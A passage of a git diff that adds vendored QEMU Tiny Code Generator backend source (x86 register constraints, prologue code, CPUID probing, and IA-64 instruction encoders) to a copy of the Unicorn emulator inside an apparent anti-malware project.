INDEX_op_add_i64, { "r", "r", "re" } }, + { INDEX_op_mul_i64, { "r", "0", "re" } }, + { INDEX_op_div2_i64, { "a", "d", "0", "1", "r" } }, + { INDEX_op_divu2_i64, { "a", "d", "0", "1", "r" } }, + { INDEX_op_sub_i64, { "r", "0", "re" } }, + { INDEX_op_and_i64, { "r", "0", "reZ" } }, + { INDEX_op_or_i64, { "r", "0", "re" } }, + { INDEX_op_xor_i64, { "r", "0", "re" } }, + { INDEX_op_andc_i64, { "r", "r", "rI" } }, + + { INDEX_op_shl_i64, { "r", "0", "Ci" } }, + { INDEX_op_shr_i64, { "r", "0", "Ci" } }, + { INDEX_op_sar_i64, { "r", "0", "Ci" } }, + { INDEX_op_rotl_i64, { "r", "0", "ci" } }, + { INDEX_op_rotr_i64, { "r", "0", "ci" } }, + + { INDEX_op_brcond_i64, { "r", "re" } }, + { INDEX_op_setcond_i64, { "r", "r", "re" } }, + + { INDEX_op_bswap16_i64, { "r", "0" } }, + { INDEX_op_bswap32_i64, { "r", "0" } }, + { INDEX_op_bswap64_i64, { "r", "0" } }, + { INDEX_op_neg_i64, { "r", "0" } }, + { INDEX_op_not_i64, { "r", "0" } }, + + { INDEX_op_ext8s_i64, { "r", "r" } }, + { INDEX_op_ext16s_i64, { "r", "r" } }, + { INDEX_op_ext32s_i64, { "r", "r" } }, + { INDEX_op_ext8u_i64, { "r", "r" } }, + { INDEX_op_ext16u_i64, { "r", "r" } }, + { INDEX_op_ext32u_i64, { "r", "r" } }, + + { INDEX_op_deposit_i64, { "Q", "0", "Q" } }, + { INDEX_op_movcond_i64, { "r", "r", "re", "r", "0" } }, + + { INDEX_op_mulu2_i64, { "a", "d", "a", "r" } }, + { INDEX_op_muls2_i64, { "a", "d", "a", "r" } }, + { INDEX_op_add2_i64, { "r", "r", "0", "1", "re", "re" } }, + { INDEX_op_sub2_i64, { "r", "r", "0", "1", "re", "re" } }, +#endif + +#if TCG_TARGET_REG_BITS == 64 + { INDEX_op_qemu_ld_i32, { "r", "L" } }, + { INDEX_op_qemu_st_i32, { "L", "L" } }, + { INDEX_op_qemu_ld_i64, { "r", "L" } }, + { INDEX_op_qemu_st_i64, { "L", "L" } }, +#elif TARGET_LONG_BITS <= TCG_TARGET_REG_BITS + { INDEX_op_qemu_ld_i32, { "r", "L" } }, + { INDEX_op_qemu_st_i32, { "L", "L" } }, + { INDEX_op_qemu_ld_i64, { "r", "r", "L" } }, + { INDEX_op_qemu_st_i64, { "L", "L", "L" } }, +#else + { INDEX_op_qemu_ld_i32, { "r", "L", "L" } }, + { INDEX_op_qemu_st_i32, { "L", "L", "L" } }, + { INDEX_op_qemu_ld_i64, { "r", "r", "L", "L" } }, + { INDEX_op_qemu_st_i64, { "L", "L", "L", "L" } }, +#endif + { -1 }, +}; + +static int tcg_target_callee_save_regs[] = { +#if TCG_TARGET_REG_BITS == 64 + TCG_REG_RBP, + TCG_REG_RBX, +#if (defined(_WIN64) || defined(__CYGWIN__)) + TCG_REG_RDI, + TCG_REG_RSI, +#endif + TCG_REG_R12, + TCG_REG_R13, + TCG_REG_R14, /* Currently used for the global env. */ + TCG_REG_R15, +#else + TCG_REG_EBP, /* Currently used for the global env. */ + TCG_REG_EBX, + TCG_REG_ESI, + TCG_REG_EDI, +#endif +}; + +/* Compute frame size via macros, to share between tcg_target_qemu_prologue + and tcg_register_jit. */ + +#define PUSH_SIZE \ + ((1 + ARRAY_SIZE(tcg_target_callee_save_regs)) \ + * (TCG_TARGET_REG_BITS / 8)) + +#define FRAME_SIZE \ + ((PUSH_SIZE \ + + TCG_STATIC_CALL_ARGS_SIZE \ + + CPU_TEMP_BUF_NLONGS * sizeof(long) \ + + TCG_TARGET_STACK_ALIGN - 1) \ + & ~(TCG_TARGET_STACK_ALIGN - 1)) + +/* Generate global QEMU prologue and epilogue code */ +static void tcg_target_qemu_prologue(TCGContext *s) +{ + int i, stack_addend; + + /* TB prologue */ + + /* Reserve some stack space, also for TCG temps. */ + stack_addend = FRAME_SIZE - PUSH_SIZE; + tcg_set_frame(s, TCG_REG_CALL_STACK, TCG_STATIC_CALL_ARGS_SIZE, + CPU_TEMP_BUF_NLONGS * sizeof(long)); + + /* Save all callee saved registers. */ + for (i = 0; i < ARRAY_SIZE(tcg_target_callee_save_regs); i++) { + tcg_out_push(s, tcg_target_callee_save_regs[i]); + } + +#if TCG_TARGET_REG_BITS == 32 + tcg_out_ld(s, TCG_TYPE_PTR, TCG_AREG0, TCG_REG_ESP, + (ARRAY_SIZE(tcg_target_callee_save_regs) + 1) * 4); + tcg_out_addi(s, TCG_REG_ESP, -stack_addend); + /* jmp *tb. */ + tcg_out_modrm_offset(s, OPC_GRP5, EXT5_JMPN_Ev, TCG_REG_ESP, + (ARRAY_SIZE(tcg_target_callee_save_regs) + 2) * 4 + + stack_addend); +#else + tcg_out_mov(s, TCG_TYPE_PTR, TCG_AREG0, tcg_target_call_iarg_regs[0]); + tcg_out_addi(s, TCG_REG_ESP, -stack_addend); + /* jmp *tb. */ + tcg_out_modrm(s, OPC_GRP5, EXT5_JMPN_Ev, tcg_target_call_iarg_regs[1]); +#endif + + /* TB epilogue */ + s->tb_ret_addr = s->code_ptr; + + tcg_out_addi(s, TCG_REG_CALL_STACK, stack_addend); + + for (i = ARRAY_SIZE(tcg_target_callee_save_regs) - 1; i >= 0; i--) { + tcg_out_pop(s, tcg_target_callee_save_regs[i]); + } + tcg_out_opc(s, OPC_RET, 0, 0, 0); + +#if !defined(CONFIG_SOFTMMU) + /* Try to set up a segment register to point to GUEST_BASE. */ + if (GUEST_BASE) { + setup_guest_base_seg(s); + } +#endif +} + +static void tcg_target_init(TCGContext *s) +{ +#ifdef CONFIG_CPUID_H + unsigned a, b, c, d; + int max; + +#ifdef _MSC_VER + int cpu_info[4]; + __cpuid(cpu_info, 0); + max = cpu_info[0]; +#else + max = __get_cpuid_max(0, 0); +#endif + + if (max >= 1) { +#ifdef _MSC_VER + __cpuid(cpu_info, 1); + a = cpu_info[0]; + b = cpu_info[1]; + c = cpu_info[2]; + d = cpu_info[3]; +#else + __cpuid(1, a, b, c, d); +#endif +#ifndef have_cmov + /* For 32-bit, 99% certainty that we're running on hardware that + supports cmov, but we still need to check. In case cmov is not + available, we'll use a small forward branch. */ + have_cmov = (d & bit_CMOV) != 0; +#endif +#ifndef have_movbe + /* MOVBE is only available on Intel Atom and Haswell CPUs, so we + need to probe for it. */ + s->have_movbe = (c & bit_MOVBE) != 0; +#endif + } + + if (max >= 7) { + /* BMI1 is available on AMD Piledriver and Intel Haswell CPUs. */ +#ifdef _MSC_VER + __cpuidex(cpu_info, 7, 0); +#else + __cpuid_count(7, 0, a, b, c, d); +#endif +#ifdef bit_BMI + have_bmi1 = (b & bit_BMI) != 0; +#endif +#ifndef have_bmi2 + have_bmi2 = (b & bit_BMI2) != 0; +#endif + } +#endif + + if (TCG_TARGET_REG_BITS == 64) { + tcg_regset_set32(s->tcg_target_available_regs[TCG_TYPE_I32], 0, 0xffff); + tcg_regset_set32(s->tcg_target_available_regs[TCG_TYPE_I64], 0, 0xffff); + } else { + tcg_regset_set32(s->tcg_target_available_regs[TCG_TYPE_I32], 0, 0xff); + } + + tcg_regset_clear(s->tcg_target_call_clobber_regs); + tcg_regset_set_reg(s->tcg_target_call_clobber_regs, TCG_REG_EAX); + tcg_regset_set_reg(s->tcg_target_call_clobber_regs, TCG_REG_EDX); + tcg_regset_set_reg(s->tcg_target_call_clobber_regs, TCG_REG_ECX); + if (TCG_TARGET_REG_BITS == 64) { +#if !(defined(_WIN64) || defined(__CYGWIN__)) + tcg_regset_set_reg(s->tcg_target_call_clobber_regs, TCG_REG_RDI); + tcg_regset_set_reg(s->tcg_target_call_clobber_regs, TCG_REG_RSI); +#endif + tcg_regset_set_reg(s->tcg_target_call_clobber_regs, TCG_REG_R8); + tcg_regset_set_reg(s->tcg_target_call_clobber_regs, TCG_REG_R9); + tcg_regset_set_reg(s->tcg_target_call_clobber_regs, TCG_REG_R10); + tcg_regset_set_reg(s->tcg_target_call_clobber_regs, TCG_REG_R11); + } + + tcg_regset_clear(s->reserved_regs); + tcg_regset_set_reg(s->reserved_regs, TCG_REG_CALL_STACK); + + tcg_add_target_add_op_defs(s, x86_op_defs); +} diff --git a/ai_anti_malware/unicorn/unicorn-master/qemu/tcg/i386/tcg-target.h b/ai_anti_malware/unicorn/unicorn-master/qemu/tcg/i386/tcg-target.h new file mode 100644 index 0000000..fdea43b --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/qemu/tcg/i386/tcg-target.h @@ -0,0 +1,148 @@ +/* + * Tiny Code Generator for QEMU + * + * Copyright (c) 2008 Fabrice Bellard + * + * Permission is hereby granted, free of charge, to any person obtaining a copy + * of this software and associated documentation files (the "Software"), to deal + * in the Software without restriction, including without limitation the rights + * to use, copy, modify, merge, publish, distribute, sublicense, and/or sell + * copies of the Software, and to permit persons to whom the Software is + * furnished to do so, subject to the following conditions: + * + * The above copyright notice and this permission notice shall be included in + * all copies or substantial portions of the Software. + * + * THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR + * IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, + * FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL + * THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER + * LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, + * OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN + * THE SOFTWARE. + */ +#ifndef TCG_TARGET_I386 +#define TCG_TARGET_I386 1 + +#define TCG_TARGET_INSN_UNIT_SIZE 1 + +#ifdef __x86_64__ +# define TCG_TARGET_REG_BITS 64 +# define TCG_TARGET_NB_REGS 16 +#else +# define TCG_TARGET_REG_BITS 32 +# define TCG_TARGET_NB_REGS 8 +#endif + +typedef enum { + TCG_REG_EAX = 0, + TCG_REG_ECX, + TCG_REG_EDX, + TCG_REG_EBX, + TCG_REG_ESP, + TCG_REG_EBP, + TCG_REG_ESI, + TCG_REG_EDI, + + /* 64-bit registers; always define the symbols to avoid + too much if-deffing. */ + TCG_REG_R8, + TCG_REG_R9, + TCG_REG_R10, + TCG_REG_R11, + TCG_REG_R12, + TCG_REG_R13, + TCG_REG_R14, + TCG_REG_R15, + TCG_REG_RAX = TCG_REG_EAX, + TCG_REG_RCX = TCG_REG_ECX, + TCG_REG_RDX = TCG_REG_EDX, + TCG_REG_RBX = TCG_REG_EBX, + TCG_REG_RSP = TCG_REG_ESP, + TCG_REG_RBP = TCG_REG_EBP, + TCG_REG_RSI = TCG_REG_ESI, + TCG_REG_RDI = TCG_REG_EDI, +} TCGReg; + +/* used for function call generation */ +#define TCG_REG_CALL_STACK TCG_REG_ESP +#define TCG_TARGET_STACK_ALIGN 16 +#if defined(_WIN64) || (defined(__CYGWIN__) && defined(__x86_64__)) +#define TCG_TARGET_CALL_STACK_OFFSET 32 +#else +#define TCG_TARGET_CALL_STACK_OFFSET 0 +#endif + +extern bool have_bmi1; + +/* optional instructions */ +#define TCG_TARGET_HAS_div2_i32 1 +#define TCG_TARGET_HAS_rot_i32 1 +#define TCG_TARGET_HAS_ext8s_i32 1 +#define TCG_TARGET_HAS_ext16s_i32 1 +#define TCG_TARGET_HAS_ext8u_i32 1 +#define TCG_TARGET_HAS_ext16u_i32 1 +#define TCG_TARGET_HAS_bswap16_i32 1 +#define TCG_TARGET_HAS_bswap32_i32 1 +#define TCG_TARGET_HAS_neg_i32 1 +#define TCG_TARGET_HAS_not_i32 1 +#define TCG_TARGET_HAS_andc_i32 have_bmi1 +#define TCG_TARGET_HAS_orc_i32 0 +#define TCG_TARGET_HAS_eqv_i32 0 +#define TCG_TARGET_HAS_nand_i32 0 +#define TCG_TARGET_HAS_nor_i32 0 +#define TCG_TARGET_HAS_deposit_i32 1 +#define TCG_TARGET_HAS_movcond_i32 1 +#define TCG_TARGET_HAS_add2_i32 1 +#define TCG_TARGET_HAS_sub2_i32 1 +#define TCG_TARGET_HAS_mulu2_i32 1 +#define TCG_TARGET_HAS_muls2_i32 1 +#define TCG_TARGET_HAS_muluh_i32 0 +#define TCG_TARGET_HAS_mulsh_i32 0 + +#if TCG_TARGET_REG_BITS == 64 +#define TCG_TARGET_HAS_trunc_shr_i32 0 +#define TCG_TARGET_HAS_div2_i64 1 +#define TCG_TARGET_HAS_rot_i64 1 +#define TCG_TARGET_HAS_ext8s_i64 1 +#define TCG_TARGET_HAS_ext16s_i64 1 +#define TCG_TARGET_HAS_ext32s_i64 1 +#define TCG_TARGET_HAS_ext8u_i64 1 +#define TCG_TARGET_HAS_ext16u_i64 1 +#define TCG_TARGET_HAS_ext32u_i64 1 +#define TCG_TARGET_HAS_bswap16_i64 1 +#define TCG_TARGET_HAS_bswap32_i64 1 +#define TCG_TARGET_HAS_bswap64_i64 1 +#define TCG_TARGET_HAS_neg_i64 1 +#define TCG_TARGET_HAS_not_i64 1 +#define TCG_TARGET_HAS_andc_i64 have_bmi1 +#define TCG_TARGET_HAS_orc_i64 0 +#define TCG_TARGET_HAS_eqv_i64 0 +#define TCG_TARGET_HAS_nand_i64 0 +#define TCG_TARGET_HAS_nor_i64 0 +#define TCG_TARGET_HAS_deposit_i64 1 +#define TCG_TARGET_HAS_movcond_i64 1 +#define TCG_TARGET_HAS_add2_i64 1 +#define TCG_TARGET_HAS_sub2_i64 1 +#define TCG_TARGET_HAS_mulu2_i64 1 +#define TCG_TARGET_HAS_muls2_i64 1 +#define TCG_TARGET_HAS_muluh_i64 0 +#define TCG_TARGET_HAS_mulsh_i64 0 +#endif + +#define TCG_TARGET_deposit_i32_valid(ofs, len) \ + (((ofs) == 0 && (len) == 8) || ((ofs) == 8 && (len) == 8) || \ + ((ofs) == 0 && (len) == 16)) +#define TCG_TARGET_deposit_i64_valid TCG_TARGET_deposit_i32_valid + +#if TCG_TARGET_REG_BITS == 64 +# define TCG_AREG0 TCG_REG_R14 +#else +# define TCG_AREG0 TCG_REG_EBP +#endif + +static inline void flush_icache_range(uintptr_t start, uintptr_t stop) +{ +} + +#endif diff --git a/ai_anti_malware/unicorn/unicorn-master/qemu/tcg/ia64/tcg-target.c b/ai_anti_malware/unicorn/unicorn-master/qemu/tcg/ia64/tcg-target.c new file mode 100644 index 0000000..a7a681c --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/qemu/tcg/ia64/tcg-target.c @@ -0,0 +1,2446 @@ +/* + * Tiny Code Generator for QEMU + * + * Copyright (c) 2009-2010 Aurelien Jarno + * Based on i386/tcg-target.c - Copyright (c) 2008 Fabrice Bellard + * + * Permission is hereby granted, free of charge, to any person obtaining a copy + * of this software and associated documentation files (the "Software"), to deal + * in the Software without restriction, including without limitation the rights + * to use, copy, modify, merge, publish, distribute, sublicense, and/or sell + * copies of the Software, and to permit persons to whom the Software is + * furnished to do so, subject to the following conditions: + * + * The above copyright notice and this permission notice shall be included in + * all copies or substantial portions of the Software. + * + * THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR + * IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, + * FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL + * THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER + * LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, + * OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN + * THE SOFTWARE. + */ + +/* + * Register definitions + */ + +#ifndef NDEBUG +static const char * const tcg_target_reg_names[TCG_TARGET_NB_REGS] = { + "r0", "r1", "r2", "r3", "r4", "r5", "r6", "r7", + "r8", "r9", "r10", "r11", "r12", "r13", "r14", "r15", + "r16", "r17", "r18", "r19", "r20", "r21", "r22", "r23", + "r24", "r25", "r26", "r27", "r28", "r29", "r30", "r31", + "r32", "r33", "r34", "r35", "r36", "r37", "r38", "r39", + "r40", "r41", "r42", "r43", "r44", "r45", "r46", "r47", + "r48", "r49", "r50", "r51", "r52", "r53", "r54", "r55", + "r56", "r57", "r58", "r59", "r60", "r61", "r62", "r63", +}; +#endif + +#ifdef CONFIG_USE_GUEST_BASE +#define TCG_GUEST_BASE_REG TCG_REG_R55 +#else +#define TCG_GUEST_BASE_REG TCG_REG_R0 +#endif +#ifndef GUEST_BASE +#define GUEST_BASE 0 +#endif + +/* Branch registers */ +enum { + TCG_REG_B0 = 0, + TCG_REG_B1, + TCG_REG_B2, + TCG_REG_B3, + TCG_REG_B4, + TCG_REG_B5, + TCG_REG_B6, + TCG_REG_B7, +}; + +/* Floating point registers */ +enum { + TCG_REG_F0 = 0, + TCG_REG_F1, + TCG_REG_F2, + TCG_REG_F3, + TCG_REG_F4, + TCG_REG_F5, + TCG_REG_F6, + TCG_REG_F7, + TCG_REG_F8, + TCG_REG_F9, + TCG_REG_F10, + TCG_REG_F11, + TCG_REG_F12, + TCG_REG_F13, + TCG_REG_F14, + TCG_REG_F15, +}; + +/* Predicate registers */ +enum { + TCG_REG_P0 = 0, + TCG_REG_P1, + TCG_REG_P2, + TCG_REG_P3, + TCG_REG_P4, + TCG_REG_P5, + TCG_REG_P6, + TCG_REG_P7, + TCG_REG_P8, + TCG_REG_P9, + TCG_REG_P10, + TCG_REG_P11, + TCG_REG_P12, + TCG_REG_P13, + TCG_REG_P14, + TCG_REG_P15, +}; + +/* Application registers */ +enum { + TCG_REG_PFS = 64, +}; + +static const int tcg_target_reg_alloc_order[] = { + TCG_REG_R35, + TCG_REG_R36, + TCG_REG_R37, + TCG_REG_R38, + TCG_REG_R39, + TCG_REG_R40, + TCG_REG_R41, + TCG_REG_R42, + TCG_REG_R43, + TCG_REG_R44, + TCG_REG_R45, + TCG_REG_R46, + TCG_REG_R47, + TCG_REG_R48, + TCG_REG_R49, + TCG_REG_R50, + TCG_REG_R51, + TCG_REG_R52, + TCG_REG_R53, + TCG_REG_R54, + TCG_REG_R55, + TCG_REG_R14, + TCG_REG_R15, + TCG_REG_R16, + TCG_REG_R17, + TCG_REG_R18, + TCG_REG_R19, + TCG_REG_R20, + TCG_REG_R21, + TCG_REG_R22, + TCG_REG_R23, + TCG_REG_R24, + TCG_REG_R25, + TCG_REG_R26, + TCG_REG_R27, + TCG_REG_R28, + TCG_REG_R29, + TCG_REG_R30, + TCG_REG_R31, + TCG_REG_R56, + TCG_REG_R57, + TCG_REG_R58, + TCG_REG_R59, + TCG_REG_R60, + TCG_REG_R61, + TCG_REG_R62, + TCG_REG_R63, + TCG_REG_R8, + TCG_REG_R9, + TCG_REG_R10, + TCG_REG_R11 +}; + +static const int tcg_target_call_iarg_regs[8] = { + TCG_REG_R56, + TCG_REG_R57, + TCG_REG_R58, + TCG_REG_R59, + TCG_REG_R60, + TCG_REG_R61, + TCG_REG_R62, + TCG_REG_R63, +}; + +static const int tcg_target_call_oarg_regs[] = { + TCG_REG_R8 +}; + +/* + * opcode formation + */ + +/* bundle templates: stops (double bar in the IA64 manual) are marked with + an uppercase letter. */ +enum { + mii = 0x00, + miI = 0x01, + mIi = 0x02, + mII = 0x03, + mlx = 0x04, + mLX = 0x05, + mmi = 0x08, + mmI = 0x09, + Mmi = 0x0a, + MmI = 0x0b, + mfi = 0x0c, + mfI = 0x0d, + mmf = 0x0e, + mmF = 0x0f, + mib = 0x10, + miB = 0x11, + mbb = 0x12, + mbB = 0x13, + bbb = 0x16, + bbB = 0x17, + mmb = 0x18, + mmB = 0x19, + mfb = 0x1c, + mfB = 0x1d, +}; + +enum { + OPC_ADD_A1 = 0x10000000000ull, + OPC_AND_A1 = 0x10060000000ull, + OPC_AND_A3 = 0x10160000000ull, + OPC_ANDCM_A1 = 0x10068000000ull, + OPC_ANDCM_A3 = 0x10168000000ull, + OPC_ADDS_A4 = 0x10800000000ull, + OPC_ADDL_A5 = 0x12000000000ull, + OPC_ALLOC_M34 = 0x02c00000000ull, + OPC_BR_DPTK_FEW_B1 = 0x08400000000ull, + OPC_BR_SPTK_MANY_B1 = 0x08000001000ull, + OPC_BR_CALL_SPNT_FEW_B3 = 0x0a200000000ull, + OPC_BR_SPTK_MANY_B4 = 0x00100001000ull, + OPC_BR_CALL_SPTK_MANY_B5 = 0x02100001000ull, + OPC_BR_RET_SPTK_MANY_B4 = 0x00108001100ull, + OPC_BRL_SPTK_MANY_X3 = 0x18000001000ull, + OPC_BRL_CALL_SPNT_MANY_X4 = 0x1a200001000ull, + OPC_BRL_CALL_SPTK_MANY_X4 = 0x1a000001000ull, + OPC_CMP_LT_A6 = 0x18000000000ull, + OPC_CMP_LTU_A6 = 0x1a000000000ull, + OPC_CMP_EQ_A6 = 0x1c000000000ull, + OPC_CMP4_LT_A6 = 0x18400000000ull, + OPC_CMP4_LTU_A6 = 0x1a400000000ull, + OPC_CMP4_EQ_A6 = 0x1c400000000ull, + OPC_DEP_I14 = 0x0ae00000000ull, + OPC_DEP_I15 = 0x08000000000ull, + OPC_DEP_Z_I12 = 0x0a600000000ull, + OPC_EXTR_I11 = 0x0a400002000ull, + OPC_EXTR_U_I11 = 0x0a400000000ull, + OPC_FCVT_FX_TRUNC_S1_F10 = 0x004d0000000ull, + OPC_FCVT_FXU_TRUNC_S1_F10 = 0x004d8000000ull, + OPC_FCVT_XF_F11 = 0x000e0000000ull, + OPC_FMA_S1_F1 = 0x10400000000ull, + OPC_FNMA_S1_F1 = 0x18400000000ull, + OPC_FRCPA_S1_F6 = 0x00600000000ull, + OPC_GETF_SIG_M19 = 0x08708000000ull, + OPC_LD1_M1 = 0x08000000000ull, + OPC_LD1_M3 = 0x0a000000000ull, + OPC_LD2_M1 = 0x08040000000ull, + OPC_LD2_M3 = 0x0a040000000ull, + OPC_LD4_M1 = 0x08080000000ull, + OPC_LD4_M3 = 0x0a080000000ull, + OPC_LD8_M1 = 0x080c0000000ull, + OPC_LD8_M3 = 0x0a0c0000000ull, + OPC_MUX1_I3 = 0x0eca0000000ull, + OPC_NOP_B9 = 0x04008000000ull, + OPC_NOP_F16 = 0x00008000000ull, + OPC_NOP_I18 = 0x00008000000ull, + OPC_NOP_M48 = 0x00008000000ull, + OPC_MOV_I21 = 0x00e00100000ull, + OPC_MOV_RET_I21 = 0x00e00500000ull, + OPC_MOV_I22 = 0x00188000000ull, + OPC_MOV_I_I26 = 0x00150000000ull, + OPC_MOVL_X2 = 0x0c000000000ull, + OPC_OR_A1 = 0x10070000000ull, + OPC_OR_A3 = 0x10170000000ull, + OPC_SETF_EXP_M18 = 0x0c748000000ull, + OPC_SETF_SIG_M18 = 0x0c708000000ull, + OPC_SHL_I7 = 0x0f240000000ull, + OPC_SHR_I5 = 0x0f220000000ull, + OPC_SHR_U_I5 = 0x0f200000000ull, + OPC_SHRP_I10 = 0x0ac00000000ull, + OPC_SXT1_I29 = 0x000a0000000ull, + OPC_SXT2_I29 = 0x000a8000000ull, + OPC_SXT4_I29 = 0x000b0000000ull, + OPC_ST1_M4 = 0x08c00000000ull, + OPC_ST2_M4 = 0x08c40000000ull, + OPC_ST4_M4 = 0x08c80000000ull, + OPC_ST8_M4 = 0x08cc0000000ull, + OPC_SUB_A1 = 0x10028000000ull, + OPC_SUB_A3 = 0x10128000000ull, + OPC_UNPACK4_L_I2 = 0x0f860000000ull, + OPC_XMA_L_F2 = 0x1d000000000ull, + OPC_XOR_A1 = 0x10078000000ull, + OPC_XOR_A3 = 0x10178000000ull, + OPC_ZXT1_I29 = 0x00080000000ull, + OPC_ZXT2_I29 = 0x00088000000ull, + OPC_ZXT4_I29 = 0x00090000000ull, + + INSN_NOP_M = OPC_NOP_M48, /* nop.m 0 */ + INSN_NOP_I = OPC_NOP_I18, /* nop.i 0 */ +}; + +static inline uint64_t tcg_opc_a1(int qp, uint64_t opc, int r1, + int r2, int r3) +{ + return opc + | ((r3 & 0x7f) << 20) + | ((r2 & 0x7f) << 13) + | ((r1 & 0x7f) << 6) + | (qp & 0x3f); +} + +static inline uint64_t tcg_opc_a3(int qp, uint64_t opc, int r1, + uint64_t imm, int r3) +{ + return opc + | ((imm & 0x80) << 29) /* s */ + | ((imm & 0x7f) << 13) /* imm7b */ + | ((r3 & 0x7f) << 20) + | ((r1 & 0x7f) << 6) + | (qp & 0x3f); +} + +static inline uint64_t tcg_opc_a4(int qp, uint64_t opc, int r1, + uint64_t imm, int r3) +{ + return opc + | ((imm & 0x2000) << 23) /* s */ + | ((imm & 0x1f80) << 20) /* imm6d */ + | ((imm & 0x007f) << 13) /* imm7b */ + | ((r3 & 0x7f) << 20) + | ((r1 & 0x7f) << 6) + | (qp & 0x3f); +} + +static inline uint64_t tcg_opc_a5(int qp, uint64_t opc, int r1, + uint64_t imm, int r3) +{ + return opc + | ((imm & 0x200000) << 15) /* s */ + | ((imm & 0x1f0000) << 6) /* imm5c */ + | ((imm & 0x00ff80) << 20) /* imm9d */ + | ((imm & 0x00007f) << 13) /* imm7b */ + | ((r3 & 0x03) << 20) + | ((r1 & 0x7f) << 6) + | (qp & 0x3f); +} + +static inline uint64_t tcg_opc_a6(int qp, uint64_t opc, int p1, + int p2, int r2, int r3) +{ + return opc + | ((p2 & 0x3f) << 27) + | ((r3 & 0x7f) << 20) + | ((r2 & 0x7f) << 13) + | ((p1 & 0x3f) << 6) + | (qp & 0x3f); +} + +static inline uint64_t tcg_opc_b1(int qp, uint64_t opc, uint64_t imm) +{ + return opc + | ((imm & 0x100000) << 16) /* s */ + | ((imm & 0x0fffff) << 13) /* imm20b */ + | (qp & 0x3f); +} + +static inline uint64_t tcg_opc_b3(int qp, uint64_t opc, int b1, uint64_t imm) +{ + return opc + | ((imm & 0x100000) << 16) /* s */ + | ((imm & 0x0fffff) << 13) /* imm20b */ + | ((b1 & 0x7) << 6) + | (qp & 0x3f); +} + +static inline uint64_t tcg_opc_b4(int qp, uint64_t opc, int b2) +{ + return opc + | ((b2 & 0x7) << 13) + | (qp & 0x3f); +} + +static inline uint64_t tcg_opc_b5(int qp, uint64_t opc, int b1, int b2) +{ + return opc + | ((b2 & 0x7) << 13) + | ((b1 & 0x7) << 6) + | (qp & 0x3f); +} + + +static inline uint64_t tcg_opc_b9(int qp, uint64_t opc, uint64_t imm) +{ + return opc + | ((imm & 0x100000) << 16) /* i */ + | ((imm & 0x0fffff) << 6) /* imm20a */ + | (qp & 0x3f); +} + +static inline uint64_t tcg_opc_f1(int qp, uint64_t opc, int f1, + int f3, int f4, int f2) +{ + return opc + | ((f4 & 0x7f) << 27) + | ((f3 & 0x7f) << 20) + | ((f2 & 0x7f) << 13) + | ((f1 & 0x7f) << 6) + | (qp & 0x3f); +} + +static inline uint64_t tcg_opc_f2(int qp, uint64_t opc, int f1, + int f3, int f4, int f2) +{ + return opc + | ((f4 & 0x7f) << 27) + | ((f3 & 0x7f) << 20) + | ((f2 & 0x7f) << 13) + | ((f1 & 0x7f) << 6) + | (qp & 0x3f); +} + +static inline uint64_t tcg_opc_f6(int qp, uint64_t opc, int f1, + int p2, int f2, int f3) +{ + return opc + | ((p2 & 0x3f) << 27) + | ((f3 & 0x7f) << 20) + | ((f2 & 0x7f) << 13) + | ((f1 & 0x7f) << 6) + | (qp & 0x3f); +} + +static inline uint64_t tcg_opc_f10(int qp, uint64_t opc, int f1, int f2) +{ + return opc + | ((f2 & 0x7f) << 13) + | ((f1 & 0x7f) << 6) + | (qp & 0x3f); +} + +static inline uint64_t tcg_opc_f11(int qp, uint64_t opc, int f1, int f2) +{ + return opc + | ((f2 & 0x7f) << 13) + | ((f1 & 0x7f) << 6) + | (qp & 0x3f); +} + +static inline uint64_t tcg_opc_f16(int qp, uint64_t opc, uint64_t imm) +{ + return opc + | ((imm & 0x100000) << 16) /* i */ + | ((imm & 0x0fffff) << 6) /* imm20a */ + | (qp & 0x3f); +} + +static inline uint64_t tcg_opc_i2(int qp, uint64_t opc, int r1, + int r2, int r3) +{ + return opc + | ((r3 & 0x7f) << 20) + | ((r2 & 0x7f) << 13) + | ((r1 & 0x7f) << 6) + | (qp & 0x3f); +} + +static inline uint64_t tcg_opc_i3(int qp, uint64_t opc, int r1, + int r2, int mbtype) +{ + return opc + | ((mbtype & 0x0f) << 20) + | ((r2 & 0x7f) << 13) + | ((r1 & 0x7f) << 6) + | (qp & 0x3f); +} + +static inline uint64_t tcg_opc_i5(int qp, uint64_t opc, int r1, + int r3, int r2) +{ + return opc + | ((r3 & 0x7f) << 20) + | ((r2 & 0x7f) << 13) + | ((r1 & 0x7f) << 6) + | (qp & 0x3f); +} + +static inline uint64_t tcg_opc_i7(int qp, uint64_t opc, int r1, + int r2, int r3) +{ + return opc + | ((r3 & 0x7f) << 20) + | ((r2 & 0x7f) << 13) + | ((r1 & 0x7f) << 6) + | (qp & 0x3f); +} + +static inline uint64_t tcg_opc_i10(int qp, uint64_t opc, int r1, + int r2, int r3, uint64_t count) +{ + return opc + | ((count & 0x3f) << 27) + | ((r3 & 0x7f) << 20) + | ((r2 & 0x7f) << 13) + | ((r1 & 0x7f) << 6) + | (qp & 0x3f); +} + +static inline uint64_t tcg_opc_i11(int qp, uint64_t opc, int r1, + int r3, uint64_t pos, uint64_t len) +{ + return opc + | ((len & 0x3f) << 27) + | ((r3 & 0x7f) << 20) + | ((pos & 0x3f) << 14) + | ((r1 & 0x7f) << 6) + | (qp & 0x3f); +} + +static inline uint64_t tcg_opc_i12(int qp, uint64_t opc, int r1, + int r2, uint64_t pos, uint64_t len) +{ + return opc 